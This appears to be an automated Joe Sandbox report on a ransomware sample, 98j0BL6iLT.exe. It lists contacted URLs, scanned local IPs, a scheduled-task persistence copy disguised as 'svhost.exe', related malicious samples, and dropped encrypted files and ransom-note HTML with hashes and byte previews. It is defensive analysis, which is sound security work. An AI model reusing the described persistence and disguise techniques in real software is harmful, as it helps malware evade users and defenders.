http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d | 0% | Avira URL Cloud | safe
                        No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.symauth.com/rpa04 | 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.symauth.com/cps09 | 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.flexerasoftware.com0 | 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.symauth.com/cps0( | 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d | 98j0BL6iLT.exe, 00000000.00000003.420822378.000000000323B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl | 98j0BL6iLT.exe, 00000000.00000003.420822378.000000000323B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://ocsp.thawte.com0 | 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://protonmail.com | 98j0BL6iLT.exe, how_to_back_files.html4.0.dr, how_to_back_files.html6.0.dr, how_to_back_files.html1.0.dr, how_to_back_files.html7.0.dr | false | | high
https://www.torproject.org | 98j0BL6iLT.exe, how_to_back_files.html4.0.dr, how_to_back_files.html6.0.dr, how_to_back_files.html1.0.dr, how_to_back_files.html7.0.dr | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
IP
                                    192.168.2.39
                                    192.168.2.38
                                    192.168.2.42
                                    192.168.2.148
                                    192.168.2.41
                                    192.168.2.149
                                    192.168.2.44
                                    192.168.2.146
                                    192.168.2.43
                                    192.168.2.147
                                    192.168.2.46
                                    192.168.2.45
                                    192.168.2.48
                                    192.168.2.47
                                    192.168.2.140
                                    192.168.2.141
                                    192.168.2.144
                                    192.168.2.145
                                    192.168.2.40
                                    192.168.2.142
                                    192.168.2.143
                                    192.168.2.28
                                    192.168.2.27
                                    192.168.2.29
                                    192.168.2.31
                                    192.168.2.159
                                    192.168.2.30
                                    192.168.2.33
                                    192.168.2.157
                                    192.168.2.32
                                    192.168.2.158
                                    192.168.2.35
                                    192.168.2.34
                                    192.168.2.37
                                    192.168.2.36
                                    192.168.2.151
                                    192.168.2.152
                                    192.168.2.150
                                    192.168.2.155
                                    192.168.2.156
                                    192.168.2.153
                                    192.168.2.154
                                    192.168.2.17
                                    192.168.2.16
                                    192.168.2.19
                                    192.168.2.18
                                    192.168.2.20
                                    192.168.2.126
                                    192.168.2.127
                                    192.168.2.22
                                    192.168.2.124
                                    192.168.2.21
                                    192.168.2.125
                                    192.168.2.24
                                    192.168.2.23
                                    192.168.2.26
                                    192.168.2.128
                                    192.168.2.25
                                    192.168.2.129
                                    192.168.2.122
                                    192.168.2.123
                                    192.168.2.120
                                    192.168.2.121
                                    192.168.2.97
                                    192.168.2.137
                                    192.168.2.96
                                    192.168.2.138
                                    192.168.2.11
                                    192.168.2.99
                                    192.168.2.135
                                    192.168.2.10
                                    192.168.2.98
                                    192.168.2.136
                                    192.168.2.13
                                    192.168.2.12
                                    192.168.2.15
                                    192.168.2.139
                                    192.168.2.14
                                    192.168.2.130
                                    192.168.2.91
                                    192.168.2.90
                                    192.168.2.93
                                    192.168.2.133
                                    192.168.2.92
                                    192.168.2.134
                                    192.168.2.95
                                    192.168.2.131
                                    192.168.2.94
                                    192.168.2.132
                                    192.168.2.2
                                    192.168.2.1
                                    192.168.2.180
                                    192.168.2.181
                                    192.168.2.8
                                    192.168.2.7
                                    192.168.2.9
                                    192.168.2.4
                                    192.168.2.3
                                    192.168.2.6
                                    192.168.2.5
                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                    Analysis ID:791695
                                    Start date and time:2023-01-25 19:44:10 +01:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 13s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:98j0BL6iLT.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:29
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.rans.spre.expl.evad.winEXE@20/71@0/100
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 100% (good quality ratio 96.6%)
                                    • Quality average: 77.6%
                                    • Quality standard deviation: 23.9%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, VSSVC.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtCreateFile calls found.
                                    • Report size getting too big, too many NtOpenFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • Report size getting too big, too many NtSetValueKey calls found.
                                    • Report size getting too big, too many NtWriteFile calls found.
Time | Type | Description
19:45:06 | Task Scheduler | Run new task: svhost path: C:\Users\user\AppData\Roaming\svhost.exe
19:45:10 | API Interceptor | 3x Sleep call for process: WMIC.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
bd0bf25947d4a37404f0424edf4db9ad | LibreOffice-release.exe | Get hash | malicious | Browse | 23.35.236.109
 | 1VEzy2G1cn.exe | Get hash | malicious | Browse | 23.35.236.109
 | rUxaE9Uro6.exe | Get hash | malicious | Browse | 23.35.236.109
 | pbCVrK8Qfb.exe | Get hash | malicious | Browse | 23.35.236.109
 | 6qBV1gtL5J.exe | Get hash | malicious | Browse | 23.35.236.109
 | cryptor.exe | Get hash | malicious | Browse | 23.35.236.109
 | SecuriteInfo.com.Win64.CrypterX-gen.381.20116.exe | Get hash | malicious | Browse | 23.35.236.109
 | ABJ.bat | Get hash | malicious | Browse | 23.35.236.109
 | iWinGamesManager.exe | Get hash | malicious | Browse | 23.35.236.109
 | cryptor.exe | Get hash | malicious | Browse | 23.35.236.109
 | cryptor.bin.exe | Get hash | malicious | Browse | 23.35.236.109
 | ZjtQjQa9Bj.dll | Get hash | malicious | Browse | 23.35.236.109
 | Contracts0001.exe | Get hash | malicious | Browse | 23.35.236.109
 | I9sNE4Qudl.exe | Get hash | malicious | Browse | 23.35.236.109
 | file.exe | Get hash | malicious | Browse | 23.35.236.109
 | file.exe | Get hash | malicious | Browse | 23.35.236.109
 | file.exe | Get hash | malicious | Browse | 23.35.236.109
 | file.exe | Get hash | malicious | Browse | 23.35.236.109
 | file.exe | Get hash | malicious | Browse | 23.35.236.109
 | file.exe | Get hash | malicious | Browse | 23.35.236.109
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:Windows desktop.ini
                                    Category:dropped
                                    Size (bytes):129
                                    Entropy (8bit):5.323600488446077
                                    Encrypted:false
                                    SSDEEP:3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
                                    MD5:A526B9E7C716B3489D8CC062FBCE4005
                                    SHA1:2DF502A944FF721241BE20A9E449D2ACD07E0312
                                    SHA-256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
                                    SHA-512:D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
                                    Malicious:false
                                    Preview:[.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:Windows desktop.ini
                                    Category:dropped
                                    Size (bytes):129
                                    Entropy (8bit):5.323600488446077
                                    Encrypted:false
                                    SSDEEP:3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
                                    MD5:A526B9E7C716B3489D8CC062FBCE4005
                                    SHA1:2DF502A944FF721241BE20A9E449D2ACD07E0312
                                    SHA-256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
                                    SHA-512:D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
                                    Malicious:false
                                    Preview:[.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):991768
                                    Entropy (8bit):7.9998129773584585
                                    Encrypted:true
                                    SSDEEP:24576:uX5m4G1rn8Lxf+qgv16g76I2ViwcquUtdB8ZXIt9oM4vWA/RNwhtA:uJi1rnsAzkwgiwcM+cSlvZ/aW
                                    MD5:DC2B924DFC42C115EB70B13483F60EBC
                                    SHA1:602228E32E3EF8ABFA9DB0DC1F8B8E5E0D5EA1EF
                                    SHA-256:25BF6ED8484F044C1D1D3DD641B58448A9B14A8296863895D83F186A449FB094
                                    SHA-512:C7F666BA5AFCC050861B9A412FA5DD131B6D10603C04F9F9ED9C74392AB75AD347CAD1E640820587EA8EAC697500B31C78880915207B2AA2807BAE8EB130F2A6
                                    Malicious:true
                                    Preview:>|.6......=.......V....W..\{..]....Q..l.....O.......h.....x.F..~]...L.l.....~.O.M......'...l............9h....C...F./qj..v.c.......1....K...J%.e...! qOCY.....6l.....u4....l....]g.._..cA.q.3...S.(.L....CN.@...v..|b..-5dZ_g.(..5.0.(K.s}RX.A.......j..l...i..hf........5...4B QDO....f.D......Bd......Q....."/-.....5#*1.....s....'._.........|...oL......w}|..>VN.P.&a.o<.:..cS{..R.x........'[.P....:...+...............#G.a...{...=.....`.kI.\...._.O.Xk.X....H&.e....)....M....~......j...+...).I.y..3...W^......3.j..=......w.L...p..~a...!.Z...{...f//..K;.....y..,...y"..|.@p1....xS]......$.Mx.e.ea..v:[@|....X..f....|.!..A.*..*.;....WB1........[.{<..E^.s...:........*..BM..O.^;B....|...7...63.zb...`.....}.H.^...K..a..u...L}8.....V.(c.......D...$.e...s.;f..b.$.3K:..!.0'7..*. .U....s.|. ....pi.q.8.eAB..~.rI....]..c..l[..w..F.v..G..e1...yv..`/....)S.5..J,..M/.H.H..}......2..*w...d.B6DJ..A....u...(.b$5QC{.@..I..HJ.GC..[....!..ncD.u8.A.~...(.?_.".a
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16920
                                    Entropy (8bit):7.988589241739158
                                    Encrypted:false
                                    SSDEEP:384:12XWbvM2KjMYgIpTdZ/i9uB002Qyl1HpDwJqWgbWCHoc8VsJ2I/BY:1GOvM2bYgiTd1iEHyF0JqWgbWCIc8Vsy
                                    MD5:BBE2F027562F3D8783AD89517CA24D5F
                                    SHA1:C6ACEEBB743B2C442804EC108BC7245A09C347F1
                                    SHA-256:4019B9B7FD1D3F9A06BE7466D5D13122942FBAAA30094BC4D93A96B6EB05CFD8
                                    SHA-512:F10C5822448080421BBC897F081665F070FE975B45298EBF7A95861B6D255F90356431B2E6DB20AFF9EAD0CB4416970193C2C3224026FDFD5162DD9112CB6928
                                    Malicious:false
                                    Preview:>|.6......=.......V....W..\{..].\....e\:9sr.X..uH......a...,.....`'umh..@iRS]./..7....r..m..`.(J.-.4.=r... ...t.=.`|'.P.-...w...|{...:...t,...w.!..5..y..H.]PN.'...cfi...!.a..1....W.X....V......7...b.S............. .....N;"....TT...i....L"...e..t...u..d...&MHyX.....av./..k.]......../...\...!\.Nj..BwA....~.,.|....E....~%.G7).q...#..+.L.u7.Q.[..o.....P...PQ....b..<}c.%.....2e..t.j.> ..t.....x1..B.>2..V..s..L....m..........d...E.@2q.{.v-*.i....r.P....vc*.0....iV....:Qx(.,.......n.....Eh.Q.^M.*...'..0...........l.aKf.Ha..K..)...>.....$s.r..F_(.o..d.d!{..b(.....q..4...l...,.Vx..Un......Jh...}/.}.C.Hh}4..nh.l.J.'..........z..a...&8.Fo..+X/...Xi...u ....K....-.......}d?T7W~.\.",...m.....VA...K.5'Qz#%..=b....C.z..Zu...W.GS$.7.;w.T.Z..Ew....2...!w..,f...:.|h.#V.kb.j=.ty...Px.)..}...K:].}Z;..o:$QJ......8 .v{.^?!.q.k.lc.X...))...Yk. lU .%!....{....{..>qL..8..#....n'..p...^..%G..%.#@u(Y.....m..w..k^...#c0Q.qDT....|@...d....I(@.{...1.|........-7C.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):244417048
                                    Entropy (8bit):6.919251884180285
                                    Encrypted:false
                                    SSDEEP:6291456:4hpELQzJo3S/buKi8FpgpeNcOf77ntTVU5EAb2XO9oo:+pELQzWKi8FpgpeNcOf77ntTVU5EAb20
                                    MD5:691663F587683CDDDE61CDF8B5EC6404
                                    SHA1:C520C74D6B599D1A9FD656D87C1657F4F6079ABB
                                    SHA-256:4751B85861F5F619F7D7080483CD261776ED7011B69F8C1E65015F419DF707C6
                                    SHA-512:AE6D4C0CB687052CA666BA0B123A0B156C8AC01BCD897E6F9A92841A9D8CFEAA3274F1836E262C4EB6E3E0C3E51463DB899F97173E246175FD562D8F24E44200
                                    Malicious:false
                                    Preview:>|.6......=........?3W..4.|\....`..,9.Y...F.J.bgK.c3.Fd.A.....}..............dj..~.'....W%.....e..F.@.^.&.|5}.p*..&.......VV.....:&.w._p.H..2.*Q..>....>.....Yj....lG... .6.c.l.Nj./.%IK|k4...hyR...).ie.h+......c.p.+,...7M.....p.w....&.$X...KG..>F...?.G..M..m.eQ..!...Pb.....l%.&>._.z.o..t.\.....mn...&.f;+`.>....U.....w...i.i.l....z............xY..{.R.....$..B[LLj.yo(..l..'N9..l....n...a...(.>......0.A..w.y..m....9.V....fi.V....~,w^.-P,w5tK.K......s..vp...F.M.!.......>#....Fd.:.K.Xs.A.xwV-.A..i..?-.vd.;.:O.....r.(C'.v@.7p..s9.'.0.AO.x8..p*.....%.!~$..W..%.....A.....>....p...a@].`:..].........*-...~.Vt../~..s...#...v.sd......*FwB......f./...{.9.n.|..kR].'..oW.). ......BQ.d.x....g2DG..9.G7.D.9|..:..:......WCT.....N..$..........mh..e.{.W.b..C...\!.`.$....z=.@........}!..Mt.d....`'.W....Y.._..cvZh.[..@.F..E!.0E........O.e..a.D.u.].8..).Q...^AwK.........|>..l....sv..@V.%xs0....o$...|'...y.B..9).......S.h,x.<..C9s.|.*......... .{...@.?..bO.......By
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2794008
                                    Entropy (8bit):7.999941320269777
                                    Encrypted:true
                                    SSDEEP:49152:0UXvW84nwFeuZ8H14fVLwhBW2XlIRX0DCrt6Xu1uziA5XuQZeLLHkHY8:Tv1Fen4f2B9kXtOPuA0QZM/8
                                    MD5:AC659E4C7691EDE84A6467A87EFAA20B
                                    SHA1:16A86243CF9C1D89243FE7C492039D433BDC8BE3
                                    SHA-256:96523C790EF43C8016D2EC904A2D739176B64B4D557ECE51C4846AA52E54FB3E
                                    SHA-512:E9B52756F8C82FF715813168D6465D217EDAF47B870081235646A0CB855DBAA4C8F1E95D05002EEA32B32C78FFDC227E53C77F741FA71A1433A7B53511FC5DB9
                                    Malicious:true
                                    Preview:>|.6......=.......V....W..\{..]......r.....3Y..]..j.|...@0&.....*1..F.n5wLP.gc...F.'YO.J,.A..t.n..Nbt...Mb.3..i.....}.k....)..`~h).....4`jh...?P7K.0..-........L......"'D...Ux..Z.A.T@.;.6...@|@.Yq9Y.{.C......^....w...j...;^...WV{..t.;.V.~...L4..W....$.isSu....."..\.M.F.+.}...@.i<N......./.C..1......[.!m..{.......N...l."....L..u.LJ.X#.hdb,.Ko.V.n..CVj...`.~...3j:.R..uAXE.....L.`......>0....8..V2#.k.F.rV..M.ax.Y.Z..Dm}..>....o.ia0..G..68..\....-T......1x.....z{H.7..x..x.$.Q1B.u..P..b.K."...M.....CX....iFH....K.$u..}I...?.OZ.N..rM..n5.E...R.!.a=:..p.....ub...0"r@..!2....]......@..xBv..ue.Lj_*}.*:....n(..F..q..-. .;..........M&.OJ..H........%..`.,..g....&....O....9.....c.. ..H.......L.@.).1%.K...zV./t.|..7.E.L.[.B)Giz.....U...-.:...|].}.9...EB.....V'..2....I.w..s9..$;.X.h......$.A.zi...A.....&(h..-D...m..8KN.o;.c..2'...{L....s;Lg`....i..._t..Px-X]......_j..&.b..m.&.iQ.O" 7.L..Q..\.....y..7...B.`./.N..|e....t.XV.%.v..XX.....cs%a*;..R.... ....n..o
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):175114579
                                    Entropy (8bit):6.997748181847772
                                    Encrypted:false
                                    SSDEEP:3145728:FQN6HdDdl9HCH6eRwZ+zU5IZ+zix/5bg5ha:A6XXHCHJeZ+zU5IZ+zix/G5ha
                                    MD5:811E47ECC528DF476FAFAEA27C7AFCAE
                                    SHA1:4B4E001D2F6E22F82CE1E8543DCAFB6B3B7499DB
                                    SHA-256:04A0C34707FC04A15F8AC4FF8AB6121BADD6B8F51F20A3FAB504D48BF3B9A3AD
                                    SHA-512:AA8D82F2B478843EBAB4B7EC46DE1D093E6B8FF4929E51D9B3F927CDE00CFCF6BC4A4E09F2F5A35D39A093A19288AA03D8B2D71B3275DCA952A7677D0E2E0D65
                                    Malicious:false
                                    Preview:"..S2.l,@.....(.*..o...sA.....r...\.{....h.{.,.h.6.6....B.r..S.d...V.j.&....;..*....I..Ry.&........C..7% .g.|.....;....tQ.^..k`.E.`-....3U.usj..5..l..../...Z^l!.2@u8~..A(o.$-.Of......S.W9,....7x.].....S..*.2...=..x..f.....HDJ...e....!.BM9.+.e.tUK.<.[.........L.U4..........~.Z../).bY..f.j..[..........4+,...x7..Y.ZF..u..+........Y.`:-..}...^..u..W~q~9<Ek.s..n...e`..4.+.xK..........:>..G>..z.u.o.4L.....Y!.%../..Pn.$.n..$}&kA...>...Q....Z>.XN.]jn.&>..,..)....r....r.0_...=..1$..FA..AEL...T.....@..-O.5.*.z..O&..,:f[.....L9q.....<.;...#....Th.|..q.i.~;...._|,H..B.E..........Mg.9...@n..~+..3.....3.".^v.t.l....d?..k).I+.i.!.>...g...M..+i.-W...vwde..K....Cu-Y.hq....5kb.....S...`.._...E.|<7....=Ti.....k...;K.Q........_.2.....;.'......J......8_>.y^.R-..y#.(........C....W...P......}.M..n.!....4.6Na.b#.eF,.Q2..p...v....Y.....V.X..0......v..Iz...K.E:}..T,.X}.9..!}.....`.c....U.QB.z.y.......~...5.....Yi..........q......@..6G...<.J..s5/bC..*ne.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997304266790072
                                    Encrypted:true
                                    SSDEEP:1536:HUs6ajGMGAa6rc5o/cwnUcsExYas9/XdP20E8y6utVpqLWW4TmHn:96Ervoo/T2/deL8y6CVU0SH
                                    MD5:23BCDF6B4CDD5B88C4901AB8DE79062E
                                    SHA1:E2241BBDAE4DD15CA1170DD9AD5876A84B56FF93
                                    SHA-256:9B82C0FE441CA4BA4C36F5500E02D1E82F27426E31EE01F9A204C8A2FC7424AB
                                    SHA-512:18C02DEA53372678ACFA64141833F14F3B60B76E98A066C75D45953F873F38B1465D1BF12242E5D15C5860D3040DBFE0E3CE2CB7D8FDA5542ED6A1C92660E33B
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..%..o...s."I..r..{X3?L'....?g.......4....I1...s.?z.t.s.=..].....}....(.}...gE\.n...?{8.t.0. F.^....V9nn.....(..Y?.a.......;*..zs.;...i9.WD..AB7...../@+.q%4;K.|..}T.V.)C........=...k.`}%K.....).2U+..`IzZ#.....QlR...n5.....7.)...L.m.FZ..L..5N".d...a.!P....D...\5.EK+.E..yqu>......T...Nr.\...Pg....K.P...z...g. ....=....{].JV.%.......=n-....-rn...hl....../x..8..GV..fH..L..W.....+.O.?.8...]T.y..h,.hl.m@@..........$..L`Vw.k.c..... 2.y.S1...2..l1a....]M..W......3.'%L_...%&xP.ee.b...=..,...y3.....[..J.].2.*.#.NdVF.......G4.)......X..rv....-.;...u......'..W2..|...#. .`B..'$.H.K..e.=..1."Q.t.<x...l..F.T".x..XC...9........x(........tY..:..kB...w.u.....$....h...Ut.."r.DI.b..d{.........~D.;.@."...q.E!.....?....!^."a...H{..^VM....{...h...uT.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997542530776212
                                    Encrypted:true
                                    SSDEEP:1536:czvVZCD1l9HfhMTfs95ggBaokDmPR8L7Nt579UX0ZNoBunnFzeFVX7:czvVZCxlxfhwfs95fYseJ+kZW0FCFF
                                    MD5:911DD3F933998EA4F97043CF39CF8966
                                    SHA1:89A99BEAB6C5318A814A98DC999B7B0DFFD04DE0
                                    SHA-256:AEC0628A94A3FAB5E8A5D7325D49444878894B8E038FCF71F47A15F2242904F6
                                    SHA-512:44F65B339361605624EC37BCFAF184C7375EC9653700B876981B40A5DD0124767D80F6E642C54F931EA39CB8AA5775B8A5DBBB205ABA7ACE663E08C0AD8705D8
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..%..o...s."I..r..{X3?L'....?g.......4....I1...s...B.k.9...D&....U.}<../=.......6.8cc8W......"..Aj.c...m...W..v8.:.......q..c..................'..)s..}....^].M.)C..M....Ywlw....M..rP.R.W.7.7L.&.i.I.....].~x.....B.........K..I.]..4..".a.O.D.L..pZ..%.P..$R..?0....*."...E...)-/.%....j.,.j....3.1aM.&......b..Q..L0o].b..I.g.q........x._.pt.Tg[.Q..w..a...>../`....dt...O......3.e.H.{&.=.o.C.)..!...........r....B.,....%.^....%v....l...(.......4.hkpt[..R....|rO...U.3.S*..F...g..5.X....o..5..........ir.G.......",.J{.U)........pp...Lhr}+.M.f.?K.u.B.pO....T.r..).....1..w.4.4.#b ...w..S.G...p;.O8.d494$..vD.x....Z.....J.7..h?....HF... .....O.}z-.....&...s.6.G-R..|...u...G...W....()N.. ...]T.NW@.1.ipI.F..{..8...V....}.'..*.......*i!.n.l.y.U.}...~.f.9.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.977106146342546
                                    Encrypted:false
                                    SSDEEP:192:ZPC3UwcaIkiZ88aM8fPjwm/ntHVilFpwVaGMBWmkvnQluNJn2Cq3nzUCdw:mkZ88aLbHtH0lFpV0m8mOJqztdw
                                    MD5:15A7E4840964F45D697AA42825282A64
                                    SHA1:8B025EBAAB1CE204C05C07ECED045BAC33504AD7
                                    SHA-256:0F7767FC96133CDDE48642E650955242C1DAADEE1548F4E14CBB03609F36D1B6
